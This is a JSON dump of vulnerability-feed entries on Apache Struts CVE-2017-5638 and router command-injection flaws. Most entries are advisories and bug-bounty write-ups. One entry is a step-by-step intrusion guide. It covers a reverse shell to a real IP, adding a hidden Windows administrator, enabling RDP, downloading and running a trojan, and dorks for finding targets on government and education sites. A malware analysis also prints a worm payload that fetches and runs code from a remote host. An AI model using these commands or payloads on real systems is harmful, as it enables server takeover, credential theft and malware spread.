(S2-045,CVE-2017-5638)-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-07T00:00:00", "id": "MYHACK58:62201784026", "href": "http://www.myhack58.com/Article/html/3/62/2017/84026.htm", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-06-07T13:16:58", "description": "I always believe to share with people is a good trait, and I'm also from the vulnerability reward in the field of multi-bit security research experts learned a lot to make me last a lifetime things, so I decided in this article to share with you some of my recent little discovery, hope these things can help you Freebuf of friends early on their own vulnerability reward trip. \n! [](/Article/UploadPic/2017-6/201767192643555. png? www. myhack58. com) \nJust a few months ago, a security research expert in Apache Struts2, found a serious security vulnerability, CVE-2017-5638, probably some of you have heard of this thing. This is a remote code execution vulnerability, then Internet in a large number of Web applications are affected by this vulnerability. About three weeks later, researchers released the Struts2 exploit code. \nIn a dig before the Investigative process, I came across the following link: \nhttps://svdevems01.direct.gq1.yahoo.com/sm/login.jsp \nThis is Yahoo the a login page. \n! [](/Article/UploadPic/2017-6/201767192643648. png? www. myhack58. com) \nI have tried in this page find the vulnerability, but unfortunately I didn't find until I found the following nodes: \nhttps://svdevems01.direct.gq1.yahoo.com/sm/login/loginpagecontentgrabber.do \nNote: If you find a node address contains. action,. do or. go, then, this indicates that this Web application to run a Struts2 to. \nAs I said before, for the Struts2 vulnerability exploit code has been released, and this vulnerability using the process is also very simple. Although I know here there is vulnerability, but ready-made exploit code here does not work, so I feel may be a Web application firewall in the mischief, or that some of the things shield my attack. \nSince I was able to determine where there is indeed a vulnerability, so I couldn't stop. But if you want to submit a valid vulnerability, I have to provide a viable PoC to prove this vulnerability is valuable. After a period of research, I found an article tweet this article tweet describes how to pass a Payload to bypass the WAF and be successfully exploited this vulnerability. \nI the use of detection methods require the use of Content-Type HTTP header to send a specially crafted data packet, the header data as shown below: \nContent-Type:%{#context[\u2018com. opensymphony. xwork2. dispatcher. HttpServletResponse\u2019]. addHeader(\u2018X-Ack-Th3g3nt3lman-POC\u2019,4*4)}. multipart/form-data \nThis specially constructed request can not only make[the Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)to calculate the two multiplied by the number, and you can also request a[Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)for any other form of operation. In the above example, the request to calculate the value of 4 * 4, the server returns the result of 16, which means that this server is the presence of security vulnerabilities. \nAs shown in the following figure, the response data will contain the new header, i.e. X-Ack-Th3g3nt3lman-POC: 16 \n! [](/Article/UploadPic/2017-6/201767192643394. png? www. myhack58. com) \nThese have enough I'm through HackerOne to Yahoo to submit a vulnerability report, Yahoo skilled in the art after receiving the report within 30 minutes of the vulnerabilities were classified, and then promptly will be the presence of vulnerabilities the application offline to fix this issue, a few days later I received a Yahoo to provide me with the 5500 knife vulnerability bonus. \nIn fact, digging a hole is not difficult, as long as you are willing to spend time, willing to move the brain to think, I believe thousands of dollars of vulnerability bonuses to everyone or can be easily in the bag. Finally, I hope my these little can be found to everyone in the burrow in the process bring some inspiration. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-06-07T00:00:00", "type": "myhack58", "title": "Burrow experience | to see how I find the Yahoo remote code execution vulnerability and get the 5500 knife bonus-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-06-07T00:00:00", "id": "MYHACK58:62201786819", "href": "http://www.myhack58.com/Article/html/3/62/2017/86819.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-07T09:25:02", "description": "Recently, the national information security vulnerabilities library CNNVD received on the Apache Struts2 \uff08S2-045 remote code execution vulnerability CNNVD-201703-152 the case of the message send. Because the vulnerability affects a wide range of hazard level high, the national information security vulnerabilities library CNNVD for the tracking analysis, the situation is as follows: \nA, vulnerability introduction\nApache Struts is a United States Apache\uff08the Apache Software Foundation is responsible for the maintenance of an open source project, is used to create enterprise-class Java Web application open source MVC framework, mainly to provide two versions of the frame product: Struts 1 and Struts 2 of. \nApacheStruts 2.3.5 \u2013 2.3. 31 version and 2. 5 \u2013 2.5.10 version there is a remote code execution vulnerability CNNVD-201703-152, CVE-2017-5638 it. The vulnerability is due to the upload functionality of the exception handling function does not properly handle user input error information. Lead to a remote attacker by sending malicious packets that exploit the vulnerability in the affected on the server execute arbitrary commands. \nSecond, the vulnerability to hazards\nAn attacker can send malformed HTTP packet to exploit the vulnerability in the affected server to perform system commands, and further can completely control the server, causing a denial of service, data leakage, website creation tampering and other effects. Since the exploit without any pre-conditions such as open dmi, debug, and other functions, and enable any plugins, and therefore vulnerability to harm is more serious. \nThird, the repair measures\nCurrently, the Apache official has been directed to the vulnerabilities released a security announcement. Please the affected users to check whether or not affected by the vulnerability. \nSelf-examination manner\n\u7528\u6237 \u53ef \u67e5\u770b web \u76ee\u5f55 \u4e0b /WEB-INF/lib/ \u76ee\u5f55 \u4e0b \u7684 struts-core.x.x.jar file, if the version in Struts2. 3. 5 to Struts2. 3. 31 and Struts2. 5 to Struts2. 5. 10 between the presence of vulnerabilities. \nUpgrade repair\nAffected users can upgrade to version to Apache Struts 2.3.32 or Apache Struts 2.5.10.1 to eliminate the vulnerability. \nTemporary relief\nAs the user inconvenient to upgrade, may take the following temporary solution: \nl delete commons-fileupload-x. x. x. the jar file will cause the upload function is not available. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-03-07T00:00:00", "type": "myhack58", "title": "About Apache Struts2\uff08S2-045\uff09vulnerability briefings-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-07T00:00:00", "id": "MYHACK58:62201784024", "href": "http://www.myhack58.com/Article/html/3/62/2017/84024.htm", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-03-08T11:52:28", "description": "1.1 CVE-2017-5638 vulnerability profile\nApache Struts 2 is the world's most popular JavaWeb Server framework. However, in Struts 2 found that the presence of high-risk security vulnerability, CVE-2017-5638,S02-45,and the vulnerability impact to: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts2. 5. 10 \nVulnerability ID: CVE-2017-5638 \nVulnerability rating: HIGH \nVulnerability name: S2-045: Struts 2 remote code execution vulnerability\nVulnerability impact: based on the JakartaMultipart the parser implementation file upload when possible RCE \nAffected version: Struts 2.3.5-Struts 2.3.31 \nThe Struts 2.5-Struts 2.5.10 \nRepair solutions: \nUpgrade to Struts2. 3. 32 or the Struts 2.5.10.1 \nStruts2. 3. 32 download address: \nhttps://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32 \nStruts2. 5. 10. 1 Download: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1 \nThe vulnerability principle: Struts2 default parse the uploaded file's Content-Type header, there is a problem. In the Parse error case, the error information in the OGNL code. \n1.2 hazard assessment\nAfter the actual test, as long as the vulnerability exists for windows and linux are Server Permissions. Great harm, to be sure for many people tonight is a sleepless night. \n1. 3 vulnerabilities in the actual use of 1. 3. 1 Ready to work\n1\uff0e Get ready for a jsp webshell, the Save on the site, for example, may be 1. txt and other text file, for network download. \n2\uff0e Ready to have a separate IP of the server, \u5728\u4e0a\u9762\u6709nc.exe the. \n3\uff0e Prepare python environment. \nGeneral use python2. 7. 13 version, download address: https://www.python.org/downloads/release/python-2713/, according to the[operating system](<http://www.myhack58.com/Article/48/Article_048_1.htm>)version of the Select the installation, after the installation is complete first run will error, you need to install a module, shown in Figure 1. Need to install the poster. the encode module download address: https://pypi. python. org/pypi/poster/, the \u7136\u540e \u5230 \u8be5 \u76ee\u5f55 \u6267\u884c pythonsetup.py install, to install. Note that in python if you do not set system variables, you'll need to strip the full path to execute. For example: \nC:\\Python27\\python.exeC:\\Python27\\poster-0.8.1\\setup.py install \n! [](/Article/UploadPic/2017-3/20173818228916. jpg? www. myhack58. com) \nFigure 1 The Missing poster. the encode module \n4\uff0e Get a variety of action page \n\uff081\uff09by zoomeye to get a variety of action page to search the index. action, login. action, info. action and the like. \n\uff082\uff09Baidu aunt law\ninurl:index. actionsite:edu. cn \ninurl:index. actionsite:gov. cn \ninurl:index. actionsite:com. cn \nNote: don't vandalize, and now the network security method very good it!!! \n1.3.2 modify the poc exploit code\n1. For the linux version of the modified whoami values: bash-i>& /dev/tcp/122.115.47.39/4433 0>&1 \nDescription of 122. 115. 47. 39 for a rebound the Monitoring Server IP, port 4433, the \u7136\u540e \u5c06 \u6587\u4ef6 \u4fdd\u5b58 \u4e3a poclinux.py as shown in Figure 2. Also there can be some other common commands: id, whomai, cat /etc/passwd, cat/etc/shadow, etc. You can modify the corresponding parameters and keep a different name. \n! [](/Article/UploadPic/2017-3/20173818228744. jpg? www. myhack58. com) \nFigure 2 modify the linux poc exploit code\n2. Corresponding Windows Server, modify the whomai value: \nnet user antian365$ Wsantian365!*/ add \nnet localgroup administratorsantian365$ /add \n\u5206\u522b \u5c06 poc \u6587\u4ef6 \u4fdd\u5b58 \u4e3a pocwin1.py and pocwin2.py as shown in Figure 3. \n! [](/Article/UploadPic/2017-3/20173818228139. jpg? www. myhack58. com) \nFigure 3 modify the windows under the use of the code\n1.3.3 under Windows fast implement penetration\n1. Each other to open up 3389 \n\uff081\uff09scanning each other whether to open the 3389, open a, respectively, to execute: \npocwin1.py http://www.myhack58.com/index.action \npocwin2.py http://www.myhack58.com/index.action \nIf the other loopholes, then it will directly add a user\u201cantian365$\u201d, password\u201cWsantian365!*\u201d, the Server to open the 3389, sign up and then download wce64, directly wce64 \u2013w to get the current login password, be sure to use administrator rights to execute. \n\uff082\uff09directly on 3389 \nIn the parameters were modified three times, execute the following code three times, you can open 3389. \nwmic /namespace:\\\\\\root\\cimv2\\terminalservices pathwin32_terminalservicesetting where (__CLASS != \"\") callsetallowtsconnections 1 \nwmic/namespace:\\\\\\root\\cimv2\\terminalservices path win32_tsgeneralsetting where(TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1 \nreg add\"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /vfSingleSessionPerUser /t REG_DWORD /d 0 /f \n3389 is open on the condition that the other party is independent of the IP, if it is within the network IP the case of the second method. \n2. The Trojan executes the law\n\uff081\uff09Download the Trojan\nFirst you need to prepare a Trojan program, you need to through win2008. Then modify the win. py in the whoami parameters: \nGermany /transfer myjob1/download /priority normal http://www.myhack58.com/ma.exe c:\\windows\\temp\\ma.exe \nma. exe save in www. myhack58. com web site root directory, it will download directly to the other party c:\\windows\\temp directory. \n\uff082\uff09the execution of the Trojan, to modify the poc in the whoami parameters for the ma. exe to the true path and the address, as follows. Run save after the poc is in the original implementation. \nc:\\windows\\temp\\ma.exe \n1.3. 4Linux under the rapid penetration of the ideas\n1. On a standalone server to perform monitoring, required in the independent IP on the server, execute\u201cnc \u2013vv\u2013l \u2013p 4433\u201d, you can perform the connection about this IP the 4433 port. For example, http://www. myhack58. com:4433, if the listening port has data, it indicates the normal, otherwise check the firewall rules. \n2. Perform poc \n\n\n**[1] [[2]](<84086_2.htm>) [[3]](<84086_3.htm>) [next](<84086_2.htm>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-03-08T00:00:00", "type": "myhack58", "title": "How fast the use of s02-45 vulnerability to gain server access-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-08T00:00:00", "id": "MYHACK58:62201784086", "href": "http://www.myhack58.com/Article/html/3/62/2017/84086.htm", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-11-27T18:39:10", "description": "One, Foreword \nRecently, Tencent Security Cloud Ding lab to listen to the wind threat perception platform monitoring the discovery A to attack router worm, after analysis, found that this worm is mirai virus new variants, and before mirai viruses, the worms not only by the early generation of mirai using the telnent blast to attack more through the router vulnerability to attack propagation. \n\nSecond, the Playload and vulnerability analysis \nThe sample in the propagation and attack involved in the process to 4 PlayLoad, are for the router to attack, we will for related vulnerabilities are introduced, and for the spread of the use of sampling data for statistical analysis. Table PlayLoad case: \n! [](/Article/UploadPic/2018-11/20181127223313501.jpg) \nFigure impact of device distribution: \n! [](/Article/UploadPic/2018-11/20181127223313341. png) \nData source: Tencent Security Cloud Ding laboratory \nOn the figure is several the router vulnerability the national level, China, Russia, Japan and the United States are affected more severely in the country. With the national level of development, the network popularity there is a certain relationship, but also with the above several router sales area has a strong Association. Since the domestic equipment and more, security is not high, China's future IoT security is facing enormous challenges. \nBelow we address these four vulnerabilities were introduced: \n01 NetGear router any execution vulnerability CNNVD-201306-024\uff09 \n1. the vulnerability analysis: \nThe POC through the GET method to perform the setup. cgi, by the todo command is executed syscmd, by syscmd to execute the download and execution of virus commands. \nGET/setup. cgi? next_file=netgear. cfg&todo;=syscmd&cmd;=rm+-rf+/tmp/*;wget+http://46.17.47.82/gvv+-O+/tmp/nigger;sh+nigger+netgear&curpath;=/&currentsetting.htm;=1 HTTP/1.1 rnrn \nThe code is as follows: \nA, execute the setup. cgi after executing setup_main: the \n! [](/Article/UploadPic/2018-11/20181127223313703. png) \nB, use the GET and POST methods can be submitted to the POC of: \n! [](/Article/UploadPic/2018-11/20181127223313103. png) \nTodo parameter directly behind the transfer of the file, without doing any filtering, there is also the use of local, direct calls syscmd to execute their desired commands. \n! [](/Article/UploadPic/2018-11/20181127223313724. png) \n2. the spread of cases: \nFigure NetGear DGN devices remote arbitrary command execution vulnerability attack data statistical sampling \n! [](/Article/UploadPic/2018-11/20181127223314826. png) \nData source: Tencent Security Cloud Ding laboratory \nInitiated NetGear exploit most of the region is Russia, it can be inferred with a NetGear vulnerability scanning, virus vector infection. \n02 GPON fiber router command execution vulnerability, CVE-2018-10561/62\uff09 \n1. the vulnerability analysis: \nOn the device running the HTTP server in the authenticate check a particular path, the attacker can use this feature to bypass any terminal on the authentication. \nThrough in URL after adding a specific parameter ? images/eventually get access: \nhttp://ip:port/menu.html?images/ \nhttp://ip:port/GponForm/diag_FORM?images/ \nFigure GPONPlayLoad: the \n! [](/Article/UploadPic/2018-11/20181127223314476. png) \n2. the spread of cases: \nFigure GPON device to a remote arbitrary command execution vulnerability attack data statistical sampling \n! [](/Article/UploadPic/2018-11/20181127223314850. png) \nData source: Tencent Security Cloud Ding laboratory \nThe vulnerability of viral vector infection of a large range, for China, Georgia, Egypt the impact of the most widely used. China, the United States of the optical fiber is developing rapidly, Egypt and Georgia by the Chinese influence, the fiber development speed is also very fast, and also their affected equipment and more for a reason. \n03 Huawei HG532 series router remote command execution leakage\uff08CVE-2017-17215\uff09 \n1. the vulnerability analysis: \nFigure HG532 PlayLoad \n! [](/Article/UploadPic/2018-11/20181127223314383. png) \nWe can observe POC first submit an identity authentication information, after the upgrade the inside of the NewStatusURL tag performed want to execute the command. Module in the upnp, we find the upnp module, and find NEwStatusURL tag, the code directly through the SYSTEM to perform command-upg-g-u %s-t \u2018Firmware Upgrade....\u2019that Do not do any filtering. \n! [](/Article/UploadPic/2018-11/20181127223314572. png) \n2. the spread of cases: \nFigure Huawei HG532 device remote command execution vulnerability attack data statistical sampling \n! [](/Article/UploadPic/2018-11/20181127223314295. png) \nData source: Tencent Security Cloud Ding laboratory \nFigure CVE-2017-17215 world sphere of influence \n! [](/Article/UploadPic/2018-11/20181127223314846. png) \nData source: Tencent Security Cloud Ding laboratory \nThrough the Huawei HG532 device remote command execution attack statistics, as can be seen, the use of this vulnerability to viral vectors or scan in China, Japan, Russia is very active. \n04 Linksys multiple routers tmUnblock. cgi ttcp_ip parameter remote command execution vulnerability CNVD-2014-01260\uff09 \n\n\n**[1] [[2]](<92188_2.htm>) [next](<92188_2.htm>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-11-27T00:00:00", "type": "myhack58", "title": "Router vulnerability-prone, Mirai new variant of the struck-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-17215", "CVE-2018-10561"], "modified": "2018-11-27T00:00:00", "id": "MYHACK58:62201892188", "href": "http://www.myhack58.com/Article/html/3/62/2018/92188.htm", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "attackerkb": [{"lastseen": "2023-06-23T17:28:07", "description": "Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 03, 2020 4:30pm UTC reported:\n\nUnlike [CVE-2017-5638](<https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638>), which was exploitable out of the box, since it targeted Struts\u2019 Jakarta multipart parser, this vulnerability requires a certain set of circumstances to be true in order for Struts to be exploitable. Since Struts is a web application framework, this will depend entirely on the application the developers have created.\n\n**I don\u2019t know how common this particular scenario is.** Please read the [security bulletin](<https://cwiki.apache.org/confluence/display/WW/S2-059>) for more information. However, what I do know is that this CVE falls somewhere after [CVE-2017-5638](<https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638>) and [CVE-2018-11776](<https://attackerkb.com/topics/jgIUjIdFUR/cve-2018-11776>) on the exploitability scale, from most exploitable to least: a parser flaw, a configuration flaw, and a programming flaw.\n\nSo, definitely patch this, but also follow Struts development best practices, including those outlined in their security bulletins. No measure of mitigations will protect you from poorly written code.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 2\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-14T00:00:00", "type": "attackerkb", "title": "CVE-2019-0230", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776", "CVE-2019-0230"], "modified": "2020-11-17T00:00:00", "id": "AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "href": "https://attackerkb.com/topics/mcp2xl4Va9/cve-2019-0230", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T14:59:11", "description": "An issue was discovered on Dasan GPON home routers. Command Injection can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it\u2019s quite simple to execute commands and retrieve their output.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-05-04T00:00:00", "type": "attackerkb", "title": "CVE-2018-10562", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10562"], "modified": "2020-06-05T00:00:00", "id": "AKB:0535B80A-2642-4B04-B2FA-701CB7556A60", "href": "https://attackerkb.com/topics/zb1FMn7Q7F/cve-2018-10562", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-20T18:16:36", "description": "A command injection vulnerability was discovered on the Zyxel EMG2926 home router with firmware V1.00(AAQT.4)b8. The vulnerability is located in the diagnostic tools, specifically the nslookup function. A malicious user may exploit numerous vectors to execute arbitrary commands on the router, such as the ping_ip parameter to the expert/maintenance/diagnostic/nslookup URI.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-06T00:00:00", "type": "attackerkb", "title": "CVE-2017-6884", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6884"], "modified": "2020-06-05T00:00:00", "id": "AKB:1A9CCD3B-5055-4110-9513-247FCDC58E69", "href": "https://attackerkb.com/topics/WWNYajsdQu/cve-2017-6884", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T14:59:12", "description": "An issue was discovered on Dasan GPON home routers. It is possible to bypass authentication simply by appending \u201c?images\u201d to any URL of the device that requires authentication, as demonstrated by the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. One can then manage the device.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-05-04T00:00:00", "type": "attackerkb", "title": "CVE-2018-10561", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10561"], "modified": "2020-06-05T00:00:00", "id": "AKB:A8B25CF8-4C17-4A7A-A4F2-C89EC89A8205", "href": "https://attackerkb.com/topics/RHsDGDlxs7/cve-2018-10561", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-19T15:03:32", "description": "Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn\u2019t have value and action set and in same time, its upper package have no or wildcard namespace.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at April 14, 2020 6:33pm UTC reported:\n\nThis vulnerability exists within the Apache Struts OGNL method dispatch routine. An attacker can submit a specially crafted HTTP request to a vulnerable web server. Specifically an attacker can taint the `name` parameter passed to [`OgnlUtil::getValue()`](<https://lgtm.com/projects/g/apache/struts/snapshot/02518d8149ff0b60863b4012cd3268cf0f2942b7/files/core/src/main/java/com/opensymphony/xwork2/ognl/OgnlUtil.java?sort=name&dir=ASC&mode=heatmap#L301>).\n\nExploitation of this vulnerability would lead to code execution within the context of the Java process 